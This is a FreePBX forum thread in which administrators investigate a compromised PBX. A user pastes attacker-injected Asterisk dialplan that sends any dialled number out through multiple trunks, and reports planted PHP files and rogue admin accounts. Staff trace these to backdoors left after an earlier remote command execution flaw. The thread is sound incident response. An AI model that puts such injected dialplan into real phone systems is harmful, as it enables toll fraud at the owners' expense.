[OLD] Thankuhoh appears to be back

mvogel4949 · March 10, 2017, 1:38pm

Had a fully updated system 13-19 and just found this in the etc/asterisk/extensions_custom.conf

What are the chances that if I delete this it will reinsert itself?

[inj3ctor3-outcall]; sorry_bitch
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); sorry_bitch
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); sorry_bitch
exten => _.,n,Set(_NODEST=); sorry_bitch
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); sorry_bitch
exten => _.,n,Macro(outisbusy,); sorry_bitch
[from-internal]; thankuohoh
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); thankuohoh
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); thankuohoh
exten => _.,n,Set(_NODEST=); thankuohoh
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(outisbusy,); thankuohoh

lgaetz · March 10, 2017, 4:00pm

When you say it appears to be back, does that mean this system was compromised in a similar way in the past? If so, was the system cleaned or reinstalled? Before editing the file, get the output from:

stat /etc/asterisk/extensions_custom.conf

to see when the file was last edited.

mvogel4949 · March 10, 2017, 4:05pm

stat /etc/asterisk/extensions_custom.conf
  File: `/etc/asterisk/extensions_custom.conf'
  Size: 658             Blocks: 8          IO Block: 4096   regular file
Device: 802h/2050d      Inode: 1574607     Links: 1
Access: (0664/-rw-rw-r--)  Uid: (  499/asterisk)   Gid: (  498/asterisk)
Access: 2017-03-10 11:03:36.808453731 -0500
Modify: 2017-03-10 11:03:36.780455311 -0500
Change: 2017-03-10 11:03:36.780455311 -0500

We have a large number of systems out there and I’ve already heard from 3 people this morning

mvogel4949 · March 10, 2017, 4:19pm

None the systems that I have worked on today showed signs of being compromised at an earlier date as far as I know.

jfinstrom · March 10, 2017, 4:45pm

Please post the output of

fwconsole ma list

and wrap it in triple bactics

``` YOUR OUTPUT ```

mvogel4949 · March 10, 2017, 5:31pm

| announcement         | 13.0.6      | Enabled                                 | GPLv3+     |
| areminder            | 13.0.10.5   | Enabled                                 | Commercial |
| arimanager           | 13.0.4      | Enabled                                 | GPLv3+     |
| asterisk-cli         | 13.0.4      | Enabled                                 | GPLv3+     |
| asteriskinfo         | 13.0.7      | Enabled                                 | GPLv3+     |
| backup               | 13.0.26.1   | Enabled                                 | GPLv3+     |
| blacklist            | 13.0.14     | Enabled                                 | GPLv3+     |
| bria                 | 13.0.20     | Enabled                                 | Commercial |
| broadcast            | 13.0.12.5   | Enabled                                 | Commercial |
| builtin              |             | Enabled                                 |            |
| bulkdids             | 13.0.2      | Enabled                                 | GPLv3+     |
| bulkextensions       | 13.0.3      | Enabled                                 | GPLv3+     |
| bulkhandler          | 13.0.14.4   | Enabled                                 | GPLv3+     |
| callback             | 13.0.5      | Enabled                                 | GPLv3+     |
| callerid             | 13.0.8.1    | Enabled                                 | Commercial |
| callforward          | 13.0.4      | Enabled                                 | AGPLv3+    |
| calllimit            | 13.0.5.2    | Enabled                                 | Commercial |
| callrecording        | 13.0.11.1   | Enabled                                 | AGPLv3+    |
| callwaiting          | 13.0.4.1    | Enabled                                 | GPLv3+     |
| campon               | 13.0.4.1    | Enabled                                 | GPLv3+     |
| cdr                  | 13.0.30.5   | Enabled                                 | GPLv3+     |
| cel                  | 13.0.26.2   | Enabled                                 | GPLv3+     |
| certman              | 13.0.36.1   | Enabled                                 | AGPLv3+    |
| cidlookup            | 13.0.12.1   | Enabled                                 | GPLv3+     |
| conferences          | 13.0.23.1   | Enabled                                 | GPLv3+     |
| conferencespro       | 13.0.27.1   | Enabled                                 | Commercial |
| configedit           | 13.0.7      | Enabled                                 | AGPLv3+    |
| contactmanager       | 13.0.42.3   | Enabled                                 | GPLv3+     |
| core                 | 13.0.118.11 | Enabled                                 | GPLv3+     |
| cos                  | 13.0.11.2   | Enabled                                 | Commercial |
| customappsreg        | 13.0.5      | Enabled                                 | GPLv3+     |
| cxpanel              | 13.0.3.3    | Enabled                                 | GPLv3      |
| dahdiconfig          | 13.0.33.12  | Enabled                                 | GPLv3+     |
| dashboard            | 13.0.25     | Enabled                                 | AGPLv3+    |
| daynight             | 13.0.13     | Enabled                                 | GPLv3+     |
| dictate              | 13.0.5      | Enabled                                 | GPLv3+     |
| digium_phones        | 13.0.5      | Enabled                                 | GPLv2      |
| digiumaddoninstaller | 2.11.0.12   | Disabled                                | GPLv2      |
| directory            | 13.0.18     | Enabled                                 | GPLv3+     |
| directorypro         | 2.11.0.1    | Disabled                                | Commercial |
| disa                 | 13.0.6      | Enabled                                 | AGPLv3+    |
| donotdisturb         | 13.0.3      | Enabled                                 | GPLv3+     |
| endpoint             | 13.0.103.1  | Enabled                                 | Commercial |
| extensionroutes      | 13.0.10     | Enabled                                 | Commercial |
| fax                  | 13.0.40     | Enabled                                 | GPLv3+     |
| faxpro               | 13.0.38.2   | Enabled                                 | Commercial |
| featurecodeadmin     | 13.0.6.3    | Enabled                                 | GPLv3+     |
| findmefollow         | 13.0.38.6   | Enabled                                 | GPLv3+     |
| firewall             | 13.0.43.1   | Enabled                                 | AGPLv3+    |
| framework            | 13.0.190.19 | Enabled                                 | GPLv2+     |
| freepbx_ha           | 13.0.10.1   | Enabled                                 | Commercial |
| fw_langpacks         | 12.0.7      | Enabled                                 | GPLv3+     |
| hotelwakeup          | 13.0.16     | Enabled                                 | GPLv2      |
| iaxsettings          | 13.0.6.1    | Enabled                                 | AGPLv3     |
| infoservices         | 13.0.1      | Enabled                                 | GPLv2+     |
| irc                  | 2.11.0.7    | Enabled                                 | GPLv3+     |
| ivr                  | 13.0.26.1   | Enabled                                 | GPLv3+     |
| ivrpro               | 2.11.0.4    | Disabled                                | Commercial |
| javassh              | 2.11.2      | Enabled                                 | AGPLv3+    |
| languages            | 13.0.6      | Enabled                                 | GPLv3+     |
| logfiles             | 13.0.10.2   | Enabled                                 | GPLv3+     |
| manager              | 13.0.2.5    | Enabled                                 | GPLv2+     |
| miscapps             | 13.0.2.4    | Enabled                                 | GPLv3+     |
| miscdests            | 13.0.4      | Enabled                                 | GPLv3+     |
| music                | 13.0.22     | Enabled                                 | GPLv3+     |
| nimbusvoiceskin      | 13.0.3      | Enabled                                 | Commercial |
| outroutemsg          | 13.0.2      | Enabled                                 | GPLv3+     |
| paging               | 13.0.25.2   | Enabled                                 | GPLv3+     |
| pagingpro            | 13.0.19.3   | Enabled                                 | Commercial |
| parking              | 13.0.19.3   | Enabled                                 | GPLv3+     |
| parkpro              | 13.0.30.1   | Enabled                                 | Commercial |
| pbdirectory          | 2.11.0.5    | Enabled                                 | GPLv3+     |
| phonebook            | 13.0.5.5    | Enabled                                 | GPLv3+     |
| phpinfo              | 2.11.0.1    | Disabled                                | GPLv2+     |
| pinsets              | 13.0.8      | Enabled                                 | GPLv3+     |
| pinsetspro           | 2.11.0.11   | Disabled                                | Commercial |
| presencestate        | 13.0.7      | Enabled                                 | GPLv3+     |
| printextensions      | 13.0.3      | Enabled                                 | GPLv3+     |
| queueprio            | 13.0.2      | Enabled                                 | GPLv3+     |
| queues               | 13.0.32.5   | Enabled                                 | GPLv2+     |
| qxact_reports        | 13.0.15.2   | Enabled                                 | Commercial |
| recording_report     | 12.0.4      | Disabled                                | Commercial |
| recordings           | 13.0.30.6   | Enabled                                 | GPLv3+     |
| restapi              | 13.0.21     | Enabled                                 | AGPLv3     |
| restapps             | 12.0.44     | Disabled                                | Commercial |
| ringgroups           | 13.0.22.1   | Enabled                                 | GPLv3+     |
| rmsadmin             | 13.0.12     | Enabled                                 | Commercial |
| sangomacrm           | 13.0.1.11   | Enabled                                 | Commercial |
| setcid               | 13.0.5.1    | Enabled                                 | GPLv3+     |
| sipsettings          | 13.0.24.3   | Enabled                                 | AGPLv3+    |
| sipstation           | 13.0.13.13  | Enabled                                 | Commercial |
| sms                  | 13.0.11.1   | Enabled                                 | Commercial |
| sng_mcu              | 13.0.3      | Enabled                                 | Commercial |
| soundlang            | 13.0.24.3   | Enabled                                 | GPLv3+     |
| speeddial            | 2.11.0.4    | Enabled                                 | GPLv3+     |
| superfecta           | 13.0.3.22   | Enabled                                 | GPLv2+     |
| sysadmin             | 13.0.73.9   | Enabled                                 | Commercial |
| timeconditions       | 13.0.33.2   | Enabled                                 | GPLv3+     |
| tts                  | 13.0.8      | Enabled                                 | GPLv3+     |
| ttsengines           | 13.0.7      | Enabled                                 | AGPLv3     |
| ucp                  | 13.0.41.4   | Enabled                                 | AGPLv3+    |
| ucpnode              | 13.0.32.9   | Disabled; Pending upgrade to 13.0.33.9  | Commercial |
| userman              | 13.0.75.4   | Enabled                                 | AGPLv3+    |
| versionupgrade       |             | Not Installed (Locally available)       | Commercial |
| vmblast              | 13.0.8      | Enabled                                 | GPLv3+     |
| vmnotify             | 13.0.18.2   | Enabled                                 | Commercial |
| voicemail            | 13.0.53.6   | Enabled                                 | GPLv3+     |
| voicemail_report     | 13.0.13.1   | Enabled                                 | Commercial |
| vqplus               | 13.0.26.1   | Enabled                                 | Commercial |
| weakpasswords        | 13.0.2      | Enabled                                 | GPLv3+     |
| webcallback          | 13.0.11.1   | Enabled                                 | Commercial |
| webrtc               | 13.0.32.3   | Enabled                                 | GPLv3+     |
| xmpp                 | 13.0.14     | Enabled                                 | AGPLv3     |
| zulu                 | 13.0.49.9   | Disabled; Pending upgrade to 13.0.50.17 | Commercial |
+----------------------+-------------+-----------------------------------------+------------+

tm1000 · March 10, 2017, 5:35pm

System seems like a restore as once this is run it deletes itself. In 13 you can’t download it from the mirror which means it could have only appeared here if this system was 12 at some point

mvogel4949 · March 10, 2017, 5:40pm

I checked another system that was just programmed and shipped out a few weeks ago and found the same versionupgrade - Not installed in the fwconsole ma list.

tm1000 · March 10, 2017, 5:41pm

From where? We do not include that module in 13. The only way you can get it is through version 12.

mvogel4949 · March 10, 2017, 5:43pm

We are one of your OEM partners. We start with a Version13 Distro on every system we ship out.

tm1000 · March 10, 2017, 5:44pm

I am having our team look into this but from a quick glance we do not include that module. Can you tell me more about what’s in it?

mvogel4949 · March 10, 2017, 5:47pm

Probably a dumb question - How do I go about telling you what’s in it? (if it is Not Installed)

tm1000 · March 10, 2017, 5:48pm

ls -l /var/www/html/admin/modules/versionupgrade

mvogel4949 · March 10, 2017, 5:49pm

drwxrwxr-x 7 asterisk asterisk  4096 May 17  2016 assets
-rw-rw-r-- 1 asterisk asterisk  3308 May 17  2016 functions.inc.php
drwxrwxr-x 5 asterisk asterisk  4096 May 17  2016 i18n
-rw-rw-r-- 1 asterisk asterisk     6 May 17  2016 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 17  2016 LICENSE
-rw-rw-r-- 1 asterisk asterisk  5026 May 17  2016 module.sig
-rw-rw-r-- 1 asterisk asterisk  1287 May 17  2016 module.xml
-rw-rw-r-- 1 asterisk asterisk    94 May 17  2016 page.versionupgrade.php
-rw-rw-r-- 1 asterisk asterisk 29099 May 17  2016 Versionupgrade.class.php
drwxrwxr-x 2 asterisk asterisk  4096 May 17  2016 views

mvogel4949 · March 10, 2017, 5:52pm

It might also be helpful that in all cases today there have been numerous php folders in the var/www/html file.
lol.php
in.php
io.php
just to name a few. They have been deleted. In each case there are users created within administration - Zizo, Injector, and others. Outbound routes have a . inserted in the dialplan and in some cases a brand new outbound route is created with every trunk possible inserted in the trunk section.

Probably more information than you are interested in but thought I would include it.

mvogel4949 · March 10, 2017, 6:18pm

I have a new site with the exact same issues but I haven’t cleaned it yet. Would it help you to see anything about the system before I clean it?

tm1000 · March 10, 2017, 6:25pm

Yes Please PM myself with the IP address.

frankb · March 10, 2017, 7:27pm

Is there anything that everyone else should be concerned with at this point?? Should we all be checking anything specific in our systems??

tm1000 · March 10, 2017, 7:28pm

No. This was from the hack back in August. Specifically http://wiki.freepbx.org/display/FOP/2016-08-09+CVE+Remote+Command+Execution+with+Privileged+Escalation

The system was hacked around this time. Then cleaned up and upgraded. However cleanup processes don’t always remove every file (which is why we don’t recommend it). In this case the hacker left multiple backdoors (and by multiple I am talking about 10 different entry points).

We always let our community know immediately if there is something to be concerned about.

corradomella · March 15, 2017, 11:55am

@tm1000 Just a note: the command-line upgrade scripts to update a FreePBX Distro run the

fwconsole ma installall

command, thus installing any module offered by the repository, based on the selection previously made on the Module Admin GUI interface.

The “versionupgrade” FreePBX Module might have been on the disk - not installed but present locally - and the above command would install it again.

A standard FreePBX Distro set up from scratch installs ALL modules, including the commercial ones.

Not having all modules installed, but only those effectively in use, reduces the attack surface, minimises the dialplan footprint, speeds up reloads and updates.

We ALWAYS patch the update scripts with a sed one-liner:

for i in upgrade*;do sed s/installall/upgradeall/ $i > OK && mv -f OK $i; done

This way, only the existing, installed modules are upgraded.

If other updates to the wider system or OS require new FreePBX Modules to be installed, the dependencies will (should!) pull them and install them.